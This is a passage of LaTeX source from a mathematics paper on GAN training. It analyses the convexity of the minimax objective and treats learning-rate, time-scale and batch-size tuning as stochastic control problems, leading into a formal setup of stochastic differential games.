\item For any $d \in \mathbb{N}^*$, the set $\mathcal{M}_{\mathbb{R}}(d)$ is the space of $d\times d$ matrices with real coefficients.
\item For any vector $m \in \mathbb{R}^d$ and symmetric positive-definite matrix $ A \in \mathcal{M}_{\mathbb{R}}(d)$ with $d \in \mathbb{N}^*$, denote by $ N(m,A)$ the Gaussian distribution with mean $m$ and covariance matrix $A$.
\item $\mathbb{E}_X$ emphasizes on the dependence of expectation with respect to the distribution of $X$.
\end{itemize}
\section{GANs: Well-posedness and Convexity}
\label{sec:GAN_wellpos}
\paragraph{GANs as generative models.} GANs fall into the category of generative models. The procedure of generative modeling is to approximate an {\it unknown true} distribution ${\mathbb P}_X$ of a random variable $X$ from a sample space $\cal{X}$ by constructing a class of suitable parametrized probability distributions ${\mathbb P}_\theta$. That is, given a latent space $\cal{Z}$, define a latent variable $Z\in\cal{Z}$ with a fixed probability distribution
and a family of functions $G_\theta: \cal{Z} \to \cal{X}$ parametrized by $\theta$. Then, $\mathbb{P}_\theta$ can be seen as the probability distribution of $G_\theta(Z)$.\\
To approximate ${\mathbb P}_X$, GANs use two competing neural networks: a generator network for the function $G_\theta$, and a discriminator network $D_w$ parametrized by $w$. The discriminator $D_w$ assigns a score between $0$ and $1$ to each sample. A score closer to $1$ indicates that the sample is more likely to be from the true distribution.
GANs are trained by optimizing $G_\theta$ and $D_w$ iteratively until $D_w$ can no longer distinguish between true and generated samples and assigns a score close to $0.5$.
\paragraph{Equilibrium of GANs as minimax games.} Under a fixed network architecture, the parametrized GANs optimization problem can be viewed as the following minimax game:
\begin{align}
\min_{\theta \in \mathbb{R}^{N}} \max_{w \in \mathbb{R}^{M}} g(w,\theta),
\label{Eq:min_pbm_gan}
\end{align}
with $g:\mathbb{R}^M \times \mathbb{R}^N \rightarrow \mathbb{R}$ the objective function. In vanilla GANs,
\begin{equation}
g(w,\theta) = \mathbb{E}_X\big[\log(D_w(X))\big] + \mathbb{E}_Z\big[\log\big(1 - D_w(G_\theta(Z))\big)\big],
\label{Eq:vanilla_gan}
\end{equation}
where $D_w: \mathbb{R}^M \rightarrow \mathbb{R}$ is the discriminator network, $G_\theta: \mathbb{R}^N \rightarrow \mathbb{R}$ is the generator network, $X$ represents the unknown data distribution, and $Z$ is the latent variable. \\
From a game theory viewpoint, the objective in \eqref{Eq:min_pbm_gan}, when attained, is in fact the upper value of the two-player zero-sum game of GANs. If there exists a locally optimal pair of parameters $(\theta^*,w^*)$ for \eqref{Eq:min_pbm_gan}, then $(\theta^*,w^*)$ is a Nash equilibrium, i.e., no player can do better by unilaterally deviating from her strategy. \\
To guarantee the existence of a Nash equilibrium, convexity or concavity conditions are required at least locally. From an optimization perspective, these convexity/concavity conditions also ensure the absence of a duality gap, as suggested by Sion's generalized minimax theorem in \citep{sion1958general} and \citep{von1959theory}.
\subsection{GANs Training and Convexity}
\manuallabel{sec:GANsTrainConv}{2.2}
GANs are trained by stochastic gradient algorithms (SGA). In GANs training, if $g$ is convex (resp. concave) in $\theta$ (resp. $\omega$), then it is possible to decrease (resp. increase) the objective function $g$ by moving in the opposite (resp. same) direction of the gradient. \\
It is well known that SGA may not converge without suitable convexity properties on $g$, even when the Nash equilibrium is unique for a minimax game. For instance, $g(x,y)=xy$ clearly admits the point $(0,0)$ as a unique Nash equilibrium. However, as illustrated in Figure \ref{Fig:spiral}, SGA fails to converge since $g$ is neither strictly concave nor strictly convex in $x$ or $y$. \\
\begin{figure}[h!]
\center
\includegraphics[width=0.45\textwidth]{LSGDFxy_polished_crop.pdf}
\caption{Plot of the parameters values when using SGA to solve the minimax problem $\min_{y \in \mathbb{R}} \max_{x \in \mathbb{R}} x y$. The label ``Start" (resp. ``End") indicates the initial (resp. final) value of the parameters.}
\label{Fig:spiral}
\end{figure}
Moreover, convexity properties are easy to violate with the composition of multiple layers in a neural network even for a simple GANs model, as illustrated in the following example.
\paragraph{Counterexample.}
Take the vanilla GANs with $g$ in \eqref{Eq:vanilla_gan}. Take two normal distributions for $X$ and $Z$ such that $X \sim N(m,\sigma^2)$ and $Z \sim N(0,1)$
with $(m,\sigma)\in \mathbb{R} \times \mathbb{R}_+$. \\
Now take the following parametrization of the discriminator and the generator networks:
\begin{equation}
\label{Eq:simple_model}
\left\{
\begin{array}{ll}
D_w(x) & = D_{(w_1,w_2,w_3)}(x) = \cfrac{1}{1+e^{-(w_3/2\cdot x^2 + w_2 x + w_1 )}},\\
G_\theta (z) & = G_{(\theta_1,\theta_2)}(z) = \theta_2 z + \theta_1,
\end{array}
\right.
\end{equation}
where $w = (w_1,w_2,w_3) \in \mathbb{R}^3$, and $\theta = ( \theta_1, \theta_2) \in \mathbb{R} \times \mathbb{R}_+$.
Note that this parametrization of the discriminator and the generator networks are standard since the generator is a simple linear layer and the discriminator can be seen as the composition of the sigmoid activation function with a linear layer in the variable $(x,x^2)$.\\
To find the optimal choice for the parameters $w$ and $\theta$, denote by $f_X$ and $f_G$ respectively the density functions of $X$ and $G_\theta(Z)$. Then, the density $f_{G^*}$ of the optimal generator is given by $f_{G^*} = f_X$, meaning $\theta^* = (m,\sigma)$. Moreover, Proposition 1 in \citep{goodfellow2014generative} shows that the optimal value for the discriminator is
\begin{align*}
D_{w^*}(x) = \cfrac{f_X(x)}{f_X(x) + f_{G^*}(x)} = \cfrac{1}{1 + (f_{G^*}/f_X)(x)} = \cfrac{1}{2},
\end{align*}
for any $x\in \mathbb{R}$ which gives $w^* = (0,0,0)$. \\
We now demonstrate that the function $g$ may not satisfy the convexity/concavity requirement.
\begin{itemize}
\item To see this, let us first study the concavity of the function $g_{\theta^0}:w \rightarrow g(w,\theta^0)$ with $\theta^0$ fixed. We will show that $g_{\theta^0}$ is concave with respect to $w$.
To this end, write $D_w$ as the composition of the two following functions $D^1$ and $L$:
\begin{equation*}
\hspace{-0.2cm}D^1(x) = 1/(1+e^{-x}), \quad L(w;x) = w_3/2\cdot x^2 + w_2 x + w_1
\end{equation*}
for any $x \in \mathbb{R}$, and $w =(w_1,w_2,w_3) \in \mathbb{R}^3$. Note that a straightforward computation of the second derivatives shows that the functions
\begin{equation*}
g^1: x \rightarrow \log(D^1(x)), \quad g^2: x \rightarrow \log(1 - D^1(x)),
\end{equation*}
with $x \in \mathbb{R}$ are both concave. Thus, by linearity and composition, the function $g_{\theta^0}:w \rightarrow \mathbb{E}_X[g^1(L(w;X))] + \mathbb{E}_Z[ g^2(L(w;G_{\theta^0}(Z)))]$ remains concave.
\item Next, we investigate the convexity of the function $g_{w^0}:\theta \rightarrow g(w^0,\theta)$ with $w^0$ fixed. We will show that $g_{w^0}$ is not necessarily convex with respect to $\theta$. \\
To this end, first note that the mapping $\theta : \rightarrow \mathbb{E}_X[\log(D_w(X))]$ does not depend on the parameter $\theta$. Therefore, one can simply focus on the function $g^3:\theta \rightarrow \mathbb{E}_{Z}[\log(1 - D_{w^0}(G_{\theta}(Z)))]$, which is not necessarily convex with respect to $\theta$.
To see this, let us take $\theta_2 = 0$ for simplicity\footnote{This enables us to get rid of the expectation with respect to $Z$.} and study the function
\begin{align*}
g^3|_{\theta_2=0}: \theta_1 & \rightarrow \log(1 - D_{w^0}(G_{(\theta_1,0)}(z))) \\
& = \log\big(1 - 1/(1 + e^{-(w^0_3/2\cdot \theta_1^2 + w^0_2 \theta_1 + w^0_1)})\big),
\end{align*}
with $\theta_1 \in \mathbb{R}$. On one hand, the convexity of $g^3|_{\theta_2=0} $ depends on the choice of the parameter $w^0_3$, as demonstrated in Figure \ref{Fig:Plot_phi31}. On the other hand, simple computation of the second derivative gives
$$
(g^3|_{\theta_2=0})^{(2)}(\theta_1) =\\
-\cfrac{e^{h(\theta_1) +w_1} \big(w_3 (e^{h(\theta_1) +w_1} +2 h(\theta_1) + 1) + w_2^2\big) }{((e^{h(\theta_1) +w_1} + 1)^2}, $$
with $\theta_1 \in \mathbb{R}$, and $h(\theta_1) = \theta_1 ( w^0_3/2 \times \theta_1 + w^0_2) $. The sign of this function depends on the choice of the parameter $w^0$. Thus, $g_{w^0}$ is not necessarily convex with respect to $\theta$.
\end{itemize}
\begin{figure}[h!]
\center
(a) \hspace{3.5cm} (b)\\
\includegraphics[width=0.23\textwidth]{w3_polished_1.pdf}
\includegraphics[width=0.2325\textwidth]{w3_polished_2.pdf}
\caption{Plot of $g^3|_{\theta_2=0}$ with $(w_1,w_2,w_3) = (1,1,2)$ in (a) and $(w_1,w_2,w_3) = (1,1,-2)$ in (b).}
\label{Fig:Plot_phi31}
\end{figure}
The analysis indicates analytically one of the culprits behind the convergence issue of GANs: the lack of convexity in the objective function, hence the well-posedness problem of GANs models.
\subsection{GANs Training and Parameters Tuning}
\manuallabel{sec:GANTrainParamTun}{2.2}
In addition to the convexity and well-posedness issue of GANs as minimax games, appropriate choices and specifications for parameters' tuning affect GANs training as well.
\paragraph{Hyper-parameters in GANs training.} There are three key hyper-parameters in stochastic gradient algorithms for GANs training: the learning rate, the batch size, and the time scale.
\begin{itemize}
\item The learning rate determines how far to move along the gradient direction. A higher learning rate accelerates the convergence, yet with a higher chance of explosion; while a lower learning rate yields slower convergence.
\item The time scale parameters monitor the number of updates of the variables $w$ and $\theta$. In the context of GANs training, there are generally two different time scales: a finer time scale for the discriminator and a coarser one for the generator or conversely. Note that more updates means faster convergence, however, also computationally more costly.
\item The batch size refers to the number of training samples used in the estimate of the gradient.
The more training samples used in the estimate, the more accurate this estimate is, yet with a higher computational cost. Smaller batch size, while providing a cruder estimate, offers a regularizing effect and lowers the chance of overfitting.
\end{itemize}
\paragraph{Example of improper learning rate.}
A simple example below demonstrates the importance of an appropriate choice of learning rate for the convergence of SGA. Consider the $\mathbb{R}$-valued function $$f(x) = (a /2) \,\, x^2 + b \, x, \qquad \forall x \in \mathbb{R},$$ where $(a,b) \in \mathbb{R}_{+} \times \mathbb{R}$. Finding the minimum $x^* = -(b/a)$ of $f$ via the gradient algorithm consists of updating an initial guess $x_0 \in \mathbb{R}$ as follows:
\begin{align}
x_{n+1} = x_{n} - \eta (a x_{n} + b ),\qquad \forall n \geq 0, \label{Eq:GradEgExplo}
\end{align}
with $\eta$ the learning rate. Let us study the behavior of the error $e_n = |x_n - x^*|^2$. By \eqref{Eq:GradEgExplo} and $ a x^* + b = 0$,
\begin{align*}
e_{n+1} = |x_{n+1} - x^*|^2 & = |x_n - x^*|^2 + 2 ( x_{n+1} - x_n ) e_n + |x_{n+1} - x_n|^2 \\
& = \big(1 - \eta a(2 - \eta a ) \big)|x_{n} - x^*|^2. \numberthis \label{Eq:GradEgExplo2}
\end{align*}
Thus, when $\eta > 2/a$, the factor $\eta a(2 - \eta a ) < 0 $ which means $ r = \big(1 - \eta a(2 - \eta a ) \big) > 1$. In such a case, Equation \eqref{Eq:GradEgExplo2} becomes
$$
e_{n+1} = r \, e_n,
$$
ensuring $e_n \rightarrow + \infty$ when $n$ goes to infinity, and leading to the failure of the convergence for the gradient algorithm. This example highlights the importance of the learning rate parameter. Such an issue of improper learning rates for GANs training will be revisited in a more general setting (see Section \ref{sec:OptLearningRate}). \\
Note that there are earlier works on optimal learning rate policies to improve the performance of gradient-like algorithms (see for instance \citep{moulines2011non}, \citep{gadat2017optimal}, and \citep{mounjid2019improving}).
\paragraph{Time scale for GANs training.} Equation \eqref{Eq:update_rule_grad} corresponds to a specific implementation where updates of the parameters $w$ and $\theta$ are alternated. However, it also is possible to consider an asynchronous update of the following form (see for example Algorithm 1 in \citep{arjovsky2017wasserstein}):
\begin{algorithm}[H]
\caption{Asynchronous gradient algorithm}
\begin{algorithmic}[1]
\For{$i = 1 \ldots n^{\theta}_{\max}$}
\For{$j = 1 \ldots n^{w}_{\max}$}
\State $w \leftarrow w + \eta^{w} g_{w}(w,\theta) $
\EndFor
\State $\theta \leftarrow \theta - \eta^{\theta} g_{\theta}(w,\theta)$
\EndFor
\end{algorithmic}
\label{Alg:async_update_rule_sde}
\end{algorithm}
where $n^{w}_{\max}$ and $n^{\theta}_{\max}$ are respectively the maximum number of iterations for the upper and the inner loop. In such a context, one naturally deals with two time scales: a finer time scale for the discriminator and a coarser one for the generator. The time scale parameters $n^{w}_{\max}$ and $n^{\theta}_{\max}$ monitor the number of updates of the variables $w$ and $\theta$. As mentioned earlier, more updates means faster convergence but at the cost of more gradient computations. It is therefore necessary to select these parameters carefully in order to perform updates only when needed.
\paragraph{Batch size for GANs training.}
To better understand the batch size impact, we consider here the vanilla objective function $g$, i.e.,
\begin{equation*}
g(w,\theta) = \mathbb{E}_X\big[\log(D_w(X))\big] + \mathbb{E}_Z\big[\log\big(1 - D_w(G_\theta(Z))\big)\big].
\end{equation*}
In general, the function $g$ is approximated by the empirical mean
\begin{equation}
g^{NM}(w,\theta) = \cfrac{\sum_{i = 1}^N \sum_{j = 1}^M g^{i,j}(w,\theta)}{N \cdot M},
\label{Eq:empMeanEstimate}
\end{equation}
with
$$
g^{i,j}(w,\theta) = \log( D_{w}(x_i)) + \log\big(1 - D_{w}\big(G_{\theta}(z_j)\big)\big),
$$
where $(x_i)_{i \leq N}$ are i.i.d. samples from $\mathbb{P}_X$ the distribution of $X$, $(z_j)_{j \leq M}$ are i.i.d. samples from $\mathbb{P}_Z$ the distribution of $Z$, and $N$ (resp. $M$) is the number of $\mathbb{P}_X$ (resp. $\mathbb{P}_Z$) samples. The quantity $N\cdot M$ here represents the batch size. It is clear from Equation \eqref{Eq:empMeanEstimate} that enlarging the batch size offers a better estimate of $g^{NM}(w,\theta)$ since it reduces the variance. However, such an improvement requires a higher computational power. Sometimes, it is better to spend such a power on performing more gradient updates rather than reducing the variance.
\section{Control and Game Formulation of GANs Training}
Clearly, hyper-parameters introduced in Section \ref{sec:GANTrainParamTun} are not independent for GANs training, which often involves choices between adjusting learning rates and changing sample sizes. In this section, we show how hyper-parameters' tuning can be formulated and analyzed as stochastic control problems, and how the popular practice of ``clipping'' in GANs training can be understood analytically in this framework.
\subsection{Stochastic Control of Learning Rate}
\manuallabel{sec:LRAnalysis}{3.1}
In this part, we present an optimal selection methodology for the learning rate. To start, let us recall the continuous-time stochastic differential equation used to represent GANs training.
\paragraph{SDE approximation of GANs training.} In GANs training, gradient algorithms for the optimal parameters $\theta^*$ and $w^*$ start with an initial guess $(w_0,\theta_0)$ and apply at time step $t$ the following (simultaneous) update rule:
\begin{equation}
\left\{
\begin{array}{ll}
w_{t+1} & = w_{t} + \eta g_{w}(w_t,\theta_t), \\
\theta_{t+1} & = \theta_t - \eta g_{\theta}(w_t,\theta_t),
\end{array}
\right.
\label{Eq:update_rule_grad}
\end{equation}
with $g_{w} = \nabla_{w} g$, $g_{\theta} = \nabla_{\theta} g $, and $ \eta \in \mathbb{R}_+$ the learning rate. \\
The continuous-time approximation of GANs training via functional central limit theorem \citep{cao2020approximation} replaces the update rule in \eqref{Eq:update_rule_grad} with coupled
stochastic differential equations (SDEs)
\begin{equation}
\left\{
\begin{array}{ll}
dw(t) & = g_{w}(q(t)) dt + \sqrt{\eta} \sigma_w(q(t)) dW^1(t), \\
d\theta(t) & = - g_{\theta}(q(t)) dt + \sqrt{\eta} \sigma_\theta(q(t)) dW^2(t),
\end{array}
\right.
\label{Eq:sde}
\end{equation}
where $q(t) = (w(t),\theta(t))$, the functions $\sigma_w: \mathbb{R}^{M} \times \mathbb{R}^{N} \rightarrow \mathcal{M}_{\mathbb{R}}(M)$ and $\sigma_\theta: \mathbb{R}^{M} \times \mathbb{R}^{N} \rightarrow \mathcal{M}_{\mathbb{R}}(N)$ are approximated by the covariances of $g_{w}$ and $g_{\theta}$, and the Brownian motions $W^1$ and $W^2$ are independent. Note that in this SDE approximation, the learning rates for the generator and the discriminator $(\eta,\eta)$ are fixed constants. Based on this approximation, optimal choices of learning rate can be formulated as a stochastic control problem.
\paragraph{Adaptive learning rate.} The idea goes as follows. Consider the following decomposition for the learning rate $\eta(t)$ at time $t$:
\begin{align*}
\eta(t) = \big( \eta^w(t), \eta^{\theta}(t)\big) & = \big( u^w(t) \times \bar{\eta}^w(t), u^\theta(t) \times \bar{\eta}^{\theta}(t)\big) = u(t) \bullet \bar{\eta}(t), \quad \forall t \geq 0,
\numberthis \label{eq:learning_rate}
\end{align*}
where the first component $\bar{\eta}(t) = (\bar{\eta}^w(t), \bar{\eta}^{\theta}(t))\in [\bar{\eta}^{\min},1]^2$ is a predefined base learning rate fixed by the controller using her favorite learning rate selection method, and the second component $u(t) = (u^w(t), u^{\theta}(t))$ is a $[u^{\min},u^{\max}]^2$-valued process representing an adjustment around $\bar{\eta}(t)$. The symbol $\bullet $ here is the component-wise product between vectors. Furthermore, the positive constants $\bar{\eta}^{\min}$, $u^{\min}$, and $u^{\max}$ are ``clipping'' parameters introduced to handle the convexity issue discussed earlier for GANs training, to establish ellipticity conditions needed for the regularity of the value function, and to avoid explosion. This explosion aspect will be clarified shortly. With the incorporation of the adaptive learning rate \eqref{eq:learning_rate}, the corresponding SDE for GANs training becomes
\begin{equation}
\left\{
\begin{array}{l}
dw(t) = u^{w}(t) g_{w}(q(t)) dt + \big(u^{w}\sqrt{\bar{\eta}^{w}}\big)(t) \sigma_w(q(t)) dW^1(t), \\
\\
d\theta(t) = - u^{\theta}(t) g_{\theta}(q(t)) dt + \big(u^{\theta}\sqrt{\bar{\eta}^{\theta}}\big)(t) \sigma_\theta(q(t)) dW^2(t),
\end{array}
\right. \label{Eq:sde2}
\end{equation}
with $q(t) = (w(t),\theta(t)) $ for any $t\geq 0$.
\paragraph{Optimal control of adaptive learning rate.} Let $T< \infty$ be a finite time horizon, and define the objective function $J$ as
\begin{equation*}
J(T,t,q;u) = \mathbb{E}\big[g\big(q(T)\big)\big|q(t) = q],
\end{equation*}
where $q = (w,\theta) \in \mathbb{R}^{M} \times \mathbb{R}^{N}$ is the value of the process $q(t)$ at $t \in [0,T]$. Note that the function $J$ here is similar to the mapping $g$ used in vanilla GANs (see Equation \eqref{Eq:min_pbm_gan}). The main difference consists of replacing the constant parameters $(w,\theta)$ in \eqref{Eq:min_pbm_gan} by $q(T)$ their value at the end of the training. Moreover, since $q(T)$ is a random variable, an expectation is added to estimate the average value of $g\big(q(T)\big)$. \\
Then, the control problem for the adaptive learning rate is formulated as
\begin{equation}
v(t,q) = \min_{u^\theta \in \mathcal{U}^{\theta}} \max_{u^{w} \in \mathcal{U}^{w}} J(T,t,q;u),
\label{Eq:ValFunctDef}
\end{equation}
for any $(t,q) \in [0,T] \times \mathbb{R}^M \times \mathbb{R}^N$, with $\mathcal{U}^{w}$ and $\mathcal{U}^{\theta}$ the set of appropriate admissible controls for $u^w$ and $u^\theta$. For a fixed $u^\theta \in \mathcal{U}^{\theta}$, $\mathcal{U}^{w}$ is defined as
\begin{align*}
\mathcal{U}^{w} = \big\{ u :\;& u \text{ c\`{a}dl\`{a}g in } [u^{\min},u^{\max}] \text{ adapted to } \mathbb{F}^{(W^1,W^2)},\\
& \mathbb{E}[g\big( q(T) \big) \,|\,q(0)\,] < \infty \big\},
\end{align*}
where $u^{\max} \geq u^{\min} > 0$ are the upper bounds introduced earlier. Then, we write $\mathcal{U}^{\theta}$ as follows:
\begin{align*}
\mathcal{U}^{\theta} = \big\{ u :\;& u \text{ c\`{a}dl\`{a}g in } [u^{\min},u^{\max}] \text{ adapted to } \mathbb{F}^{(W^1,W^2)},\\
& \sup_{u \in \mathcal{U}^{w}} \mathbb{E}[g\big( q(T) \big) \,|\,q(0)\,] < \infty
\big\}.
\end{align*}
\subsection{Stochastic Control of Time Scales}
\manuallabel{sec:TimeScaleSelec}{3.2}
Let us consider the following expression for $n_{\max}$:
\begin{align*}
n_{\max} = (n^{w}_{\max},n^{\theta}_{\max}) = \big( c^w \times \bar{n}^w_{\max}, c^\theta \times \bar{n}^\theta_{\max}\big) = c \bullet \bar{n}_{\max},
\end{align*}
with $\bar{n}_{\max} = (\bar{n}^{w}_{\max},\bar{n}^{\theta}_{\max})$ a base time scale parameter initially fixed by the controller and $c = (c^{w},c^{\theta})$ a constant adjustment around $\bar{n}_{\max}$. Under suitable conditions (see for example \citep{fatkullin2004computational, weinan2005analysis}) one can show that the asynchronous Algorithm \ref{Alg:async_update_rule_sde} converges towards
\begin{equation}
\left\{
\begin{array}{l}
dw(t) = \cfrac{1}{c^w \epsilon^1} g_{w}(q(t)) dt , \\
d\theta(t) = - \cfrac{1}{c^\theta} g_{\theta}(q(t)) dt,
\end{array}
\right.
\label{Eq:pde1}
\end{equation}
where $q(t) = (w(t) , \theta(t))$ and $\epsilon^1$ is a small parameter measuring the separation between time scales. Thus, the SDE version of \eqref{Eq:pde1} is
\begin{equation*}
\hspace{-0.3cm}
\left\{
\begin{array}{l}
dw(t) = \tilde{\eta}^{w} g_{w}(q(t)) dt + \tilde{\eta}^{w} \sqrt{\bar{\eta}} \sigma_w(q(t)) dW^1(t), \\
\\
d\theta(t) = - \tilde{\eta}^{\theta} g_{\theta}(q(t)) dt + \tilde{\eta}^{\theta} \sqrt{\bar{\eta}} \sigma_\theta(q(t)) dW^2(t),
\end{array}
\right.
\end{equation*}
with $\tilde{\eta}^w = 1/(c^w \epsilon^1)$, and $\tilde{\eta}^\theta = 1/c^\theta$. Comparing the dynamics of $(w(t),\theta(t))_{t \geq 0}$ with the one of Section \ref{sec:LRAnalysis} suggests that {\it the time scale and the learning rate control problems are equivalent.}
\subsection{Stochastic Control of Batch Size}
\manuallabel{sec:BatchSizeSelec}{3.3}
To understand the impact of the batch size, let us introduce a scaling factor $m^\theta \geq 1$, the terminal time $T$, a maximum number of iterations $t_{\max}$, and compare the two following algorithms:
\begin{equation*}
\hspace{-1.3cm}
\left\{
\begin{array}{ll}
w^1_{t+1} & = w^1_{t} + \eta g^{NM}_{w}(w^1_t,\theta^1_t), \\
\theta^1_{t+1} & = \theta^1_t - \eta g^{NM}_{\theta}(w^1_t,\theta^1_t),
\end{array}
\right.
\quad \forall t \leq t_{\max},
\end{equation*}
and
\begin{equation*}
\left\{
\begin{array}{ll}
w^2_{t+1} & = w^2_{t} + \eta g^{m^\theta (NM)}_{w}(w^2_t,\theta^2_t), \\
\theta^2_{t+1} & = \theta^2_t - \eta g^{m^\theta (NM)}_{\theta}(w^2_t,\theta^2_t),
\end{array}
\right.
\quad \forall t \leq t_{\max}/m^\theta.
\end{equation*}
Note that the second algorithm is simulated less to ensure computational costs for the two methods are the same, i.e., with the same number of gradient calculations. Following \citep{cao2020approximation} the continuous-time approximation for both algorithms can be written as
\begin{equation*}
\hspace{-0.7cm}
\left\{
\begin{array}{l}
dw^{1}(t) = g_{w}(q^1(t)) dt + \sqrt{\eta} \sigma_w(q^1(t)) dW^1(t), \\
\\
d\theta^1(t) = - g_{\theta}(q^1(t)) dt + \sqrt{\eta} \sigma_\theta(q^1(t)) dW^2(t),
\end{array}
\right.
\end{equation*}
and
\begin{equation*}
\left\{
\begin{array}{l}
dw^{2}(t) = g_{w}(q^2(t)) dt + \sqrt{\eta/m^\theta} \sigma_w(q^2(t)) dW^1(t), \\
\\
d\theta^2(t) = - g_{\theta}(q^2(t)) dt + \sqrt{\eta/m^\theta} \sigma_\theta(q^2(t)) dW^2(t),
\end{array}
\right.
\end{equation*}
with $q^1(t) = (w^1(t),\theta^1(t))$, $q^2(t) = (w^2(t),\theta^2(t))$, $g_w = \mathbb{E}[g_w^{NM}]$, $g_\theta = \mathbb{E}[g_\theta^{NM}]$, $\sigma_w^2$ (resp. $\sigma_\theta^2$) proportional to the variance of $g_w^{NM}$ (resp. $g_\theta^{NM}$), and $\eta \geq 0$ a constant learning rate. Note that, since samples are i.i.d., the variances of $g_w^{m^\theta NM}$ and $g_\theta^{m^\theta NM} $ are $m^\theta$ times smaller than $g_w^{NM}$ and $g_\theta^{NM} $ variances, i.e., $\mathsf{Var}(g_w^{NM}) = m^\theta \mathsf{Var}(g_w^{m^\theta NM})$, implying that enlarging the batch size reduces the variance.\\
Meanwhile, comparing the objective functions $\mathbb{E}[g(q^{1}(T))]$ and $\mathbb{E}[g(q^{2}(T/m^\theta))]$ of both implementations suggests that reducing the batch size leads to a larger time horizon which means more parameters updates. Therefore, the question of finding the right trade-off between reducing the variance and performing more updates arises naturally.\\
Now, one can select the optimal batch size in the same spirit of the learning rate control problem (see Section \ref{sec:LRAnalysis}). That is to consider
\begin{equation}
\tilde{v}^m(t,q) = \min_{m^\theta \in \mathcal{M}^{\theta}} \mathbb{E}\big[g\big(\tilde{q}^m(T)\big)\big|\tilde{q}^m(t) = q],
\label{Eq:ValFunctDef23}
\end{equation}
for any $(t,q) \in \mathbb{R}_+ \times \mathbb{R}^{M+N}$, where the process $\tilde{q}^m(t) = (\tilde{w}^m(t), \tilde{\theta}^m(t))$ represents the trained parameters at time $t$, and $\mathcal{M}^{\theta}$ is the set of admissible controls for $m^{\theta}$. The process $\tilde{q}^m$ satisfies the SDE below
\begin{equation}
\hspace{-0.3cm}
\left\{
\begin{array}{l}
d\tilde{w}^m(t) = \cfrac{g_{w}(\tilde{q}^m(t))}{m^\theta} dt + \cfrac{\sqrt{\eta} \sigma_w(\tilde{q}^m(t))}{m^\theta } d\tilde{W}^1(t), \\
\\
d\tilde{\theta}^m(t) = - \cfrac{ g_{\theta}(\tilde{q}^m(t))}{m^\theta } dt + \cfrac{\sqrt{\eta} \sigma_\theta(\tilde{q}^m(t))}{m^\theta } d\tilde{W}^2(t),
\end{array}
\right.
\label{Eq:sde23}
\end{equation}
with $\tilde{W}^1$ and $\tilde{W}^2$ two independent Brownian motions. The derivation of \eqref{Eq:sde23} is detailed in Appendix \ref{Appendix:proofOfSDE23}. Moreover, the set $\mathcal{M}^{\theta}$ is defined as
\begin{align*}
\mathcal{M}^{\theta} = \big\{ m :\;& m \text{ c\`{a}dl\`{a}g in } [1,m^{\max}] \text{ adapted to } \mathbb{F}^{(\tilde{W}^1,\tilde{W}^2)},\\
& \mathbb{E}[g\big( \tilde{q}^m( T \big) \,|\,\tilde{q}^m(0)\,] < \infty
\big\}.
\end{align*}
We allow here $m^\theta$ to be a process in order to handle a more general control problem.
\section{Stochastic Differential Games}
\label{sec:St_Game_ctrl_pbm}
The minimax game of GANs with adaptive learning rate and batch size in the previous section can be analyzed in a more general framework of stochastic differential games. In this section, we first establish a weak form of dynamic programming principle (DPP) for a class of stochastic differential games where the underlying process is not necessarily a controlled Markov diffusion and where the value function is not a priori continuous. We will then apply this weak form of dynamic programming principle to stochastic games with controlled Markov diffusion, and show that the value of such games is the unique viscosity solution to the associated Isaac-Bellman equation, under suitable technical conditions.
\subsection{Formulation of Stochastic Differential Games}
\manuallabel{subsec:form_ctrl_pbm}{8.1}
Let $d \geq 1$ be a fixed integer and $(\Omega,\mathcal{F},\mathbb{P})$ be a probability space supporting a c\`{a}dl\`{a}g $\mathbb{R}^d$-valued process $Y$ with independent increments. Given $T \in \mathbb{R}_{+}^*$, we write $\mathbb{F} = \{\mathcal{F}_t,\,0 \leq t \leq T \}$ for the completion of $Y$ natural filtration on $[0,T]$. Here $\mathbb{F}$ satisfies the usual condition (see for instance \citep{jacod2013limit}). We suppose that $\mathcal{F}_0$ is trivial and that $\mathcal{F}_T = \mathcal{F}$. Moreover, for every $t \geq 0$, set $\mathbb{F}^t = \{\mathcal{F}^t_s,\,s \geq 0 \}$ where $\mathcal{F}^t_s$ is the completion of $\sigma(Y_r - Y_t,\, t \leq r \leq s \vee t )$ by null sets of $\mathcal{F}$.\\
The set $\mathcal{T}$ refers to the collection of all $\mathbb{F}$-stopping times. For any $(\tau_1,\,\tau_2) \in \mathcal{T}^2$ such that $\tau_1 \leq \tau_2$, the subset $\mathcal{T}_{[\tau_1,\tau_2]}$ is the collection of all $\tau \in \mathcal{T}$ verifying $\tau \in [\tau_1,\tau_2]\, a.s$. When $\tau_1 = 0$, we simply write $\mathcal{T}_{\tau_2} $. We use the notations $\mathcal{T}^{t}_{[\tau_1,\tau_2]}$ and $\mathcal{T}^t_{\tau_2} $ to denote the corresponding sets of $\mathbb{F}^t$-stopping times.\\
For every $ \tau \in \mathcal{T}$ and a subset $A$ of a finite-dimensional space, we denote by $L^0_\tau(A)$ the collection of all $\mathcal{F}_\tau$-measurable random variables with values in $A$. The set $\mathbb{H}^0(A)$ is the collection of all $\mathbb{F}$-progressively measurable processes with values in $A$, and $\mathbb{H}^0_{rcll}(A) $ is the subset of all processes in $\mathbb{H}^0(A)$ which are right continuous with finite left limits. We first introduce the sets
\begin{align*}
\mathbb{S} = [0,T] \times \mathbb{R}^d, \quad \mathcal{S}_0 = \{(\tau,\epsilon);\,\tau \in \mathcal{T}_T,\, \epsilon \in L^0_\tau(\mathbb{R}^d) \}.
\end{align*}
Then we take the two sets of control processes $\mathcal{U}_0^1 \subset \mathbb{H}^0(\mathbb{R}^{k^1})$ and $\mathcal{U}_0^2 \subset \mathbb{H}^0(\mathbb{R}^{k^2}) $, with $k^1 \geq 1$ and $k^2 \geq 1$ two integers, such that the controlled state process defined as the mapping
\begin{equation*}
(\tau,\epsilon;\nu^1,\nu^2) \in \mathcal{S} \times \mathcal{U}_0^1 \times \mathcal{U}_0^2 \longrightarrow X^{(\nu^1,\nu^2)}_{\tau,\epsilon},
\end{equation*}
is well defined and
\begin{equation*}
(\theta,X^{\nu}_{\tau,\epsilon}(\theta))\in \mathcal{S}, \qquad \forall(\tau,\epsilon)\in \mathcal{S},\forall \theta \in \mathcal{T}_{[\tau,T]}.
\end{equation*}
